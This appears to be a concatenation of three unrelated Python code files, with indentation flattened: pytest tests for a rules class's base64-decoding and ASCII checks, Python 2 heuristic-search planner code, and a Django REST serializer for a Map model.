("encoded", "value", "expectation"),
[
(True, "d2hpc3BlcnM=", "whispers"),
(False, "d2hpc3BlcnM=", "d2hpc3BlcnM="),
(False, "whisper$", "whisper$"),
(False, None, None),
(False, 1, 1),
],
)
def test_decode_if_base64(encoded, value, expectation):
rules = WhisperRules()
rule = {"value": {"isBase64": encoded}}
result = rules.decode_if_base64(rule, "value", value)
assert result == expectation
@pytest.mark.parametrize(
("value", "expectation"),
[("whispers", True), (123, False), (b"binary", True), (b"\xca\xfe", False), (None, False), ("шёпот", False)],
)
def test_is_ascii(value, expectation):
rules = WhisperRules()
result = rules.is_ascii(value)
assert result == expectation
|
from set_additive import *
from ff import *
from set_additive import applicable as sa_applicable, first_goals as sa_first_goals, \
first_operators as sa_first_operators, first_combine as sa_first_combine
from planner.main import default_plan, simple_debug
from planner.progression import *
def h_0(state, goal, operators): return 0
def h_naive(state, goal, operators): return sum(1 for var, value in goal.cond() if state[var] != value)
def h_blind(state, goal, operators): return min(operator.cost for operator in ha_applicable(state, goal, operators))
###########################################################################
def ha_all(state, goal, operators): return filter_axioms(operators)
def ha_applicable(state, goal, operators): return filter_axioms([operator for operator in operators if operator(state) is not None])
def ha_all_random(state, goal, operators): return randomize(ha_all(state, goal, operators))
def ha_applicable_random(state, goal, operators): return randomize(ha_applicable(state, goal, operators))
def ha_sorted(state, goal, operators): return sorted(ha_applicable(state, goal, operators), key=lambda o: o.cost)
def ha_combine(state, goal, operators, *helpful_actions):
seen_operators = set()
for ha in helpful_actions:
ha_operators = []
for operator in ha(state, goal, operators):
if not in_add(seen_operators, operator):
ha_operators.append(operator)
yield ha_operators
###########################################################################
def combine(heuristic, helpful_actions):
return lambda s, g, o: (heuristic(s, g, o), helpful_actions(s, g, o))
def single_complete_ff(ff):
def fn(state, goal, operators):
h, ha = ff(state, goal, operators)
return h, ha + list(set(ha_applicable(state, goal, operators)) - set(ha))
return fn
def multi_complete_ff(ff):
def fn(state, goal, operators):
h, ha = ff(state, goal, operators)
yield h, ha
yield h, set(ha_applicable(state, goal, operators)) - set(ha)
return fn
# TODO - the original operator order is affecting things a lot
# NOTE - expensive to do sa for many successsors (the union operation)
#default_successors = combine(h_0, ha_applicable_random)
#default_successors = combine(h_level, ha_applicable_random)
#default_successors = combine(h_sa, ha_applicable_random)
default_successors = ff_fn(plan_cost, first_combine, op=sum)
#default_successors = sa_fn(sa_first_operators) # sa_first_goals | sa_first_operators | sa_first_combine
###########################################################################
def single_generator(initial, goal, operators, successors):
#return lambda v: (yield successors(v.state, goal, operators))
return lambda v: iter([successors(v.state, goal, operators)])
def multi_generator(initial, goal, operators, successors):
return lambda v: iter(successors(v.state, goal, operators))
default_generator = lambda i, g, o: single_generator(i, g, o, default_successors)
###########################################################################
from downward2 import write_sas, solve_sas
from collections import OrderedDict
class Problem(object):
default_val = False
def __init__(self, initial, goal, actions, axioms):
self.var_indices = {}
self.var_order = []
self.var_val_indices = {}
self.var_val_order = {}
self.axioms = axioms
self.mutexes = []
self.costs = True
self.initial = initial
for var, val in initial.values.iteritems():
self.add_val(var, val)
self.goal = goal
for var, val in goal.conditions.iteritems():
self.add_val(var, val)
self.actions = actions
for action in self.actions:
for var, val in action.conditions.iteritems():
self.add_val(var, val)
for var, val in action.effects.iteritems():
self.add_val(var, val)
def print_problem(self):
print self.initial.values.keys()
print len(self.initial.values)
print len(self.var_order)
print set(self.var_order) - set(self.initial.values.keys())
for var in self.var_order:
print var
print self.var_val_order[var]
print
def add_var(self, var):
if var not in self.var_indices:
self.var_indices[var] = len(self.var_order)
self.var_order.append(var)
self.var_val_indices[var] = {}
self.var_val_order[var] = []
self.add_val(var, self.default_val) # NOTE - I assume a default False value
def add_val(self, var, val):
self.add_var(var)
if val not in self.var_val_indices[var]:
self.var_val_indices[var][val] = len(self.var_val_order[var])
self.var_val_order[var].append(val)
def get_var(self, var):
return self.var_indices[var]
def get_val(self, var, val):
return self.var_val_indices[var][val]
def get_var_val(self, var, val):
return self.get_var(var), self.get_val(var, val)
def downward_plan(initial, goal, operators):
t0 = time()
problem = Problem(initial, goal, operators, [])
return solve_sas(problem), time() - t0
###########################################################################
#default_search = default_plan
#default_search = lambda initial, goal, generator: bfs(initial, goal, generator, INF, INF, INF, INF, INF, None)
#default_search = lambda initial, goal, generator: a_star_search(initial, goal, generator,
# lambda v: v.cost, False, INF, INF, INF, INF, INF, None)
#default_search = lambda initial, goal, generator: a_star_search(initial, goal, generator,
# lambda v: v.cost + v.h_cost, True, INF, INF, INF, INF, INF, None)
#default_search = lambda initial, goal, generator: best_first_search(initial, goal, generator,
# lambda v: v.h_cost, False, INF, INF, INF, INF, INF, None)
default_search = lambda initial, goal, generator: deferred_best_first_search(initial, goal, generator,
lambda v: v.h_cost, False, INF, INF, INF, INF, INF, None) # True vs False can matter quite a bit
#default_search = lambda initial, goal, generator: semideferred_best_first_search(initial, goal, generator,
# lambda v: v.h_cost, True, INF, INF, INF, INF, INF, None) # True vs False can matter quite a bit
#default_search = lambda initial, goal, generator: hill_climbing_search(initial, goal, generator,
# None, 0, 1, False, INF, INF, INF, INF, INF, None)
def default_plan(initial, goal, operators):
return default_search(initial, goal, default_generator(initial, goal, operators))
def default_derived_plan(initial, goal, operators, axioms):
return default_search(initial, goal, (lambda v: iter([default_successors(v.state, goal, operators + axioms)]), axioms))
|
from rest_framework import serializers
from .models import Map
class MapSerializer(serializers.ModelSerializer):
class Meta:
model = Map
fields = ('id', 'name', 'size', 'category', 'broken', 'Tscore', 'valid', 'objects')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.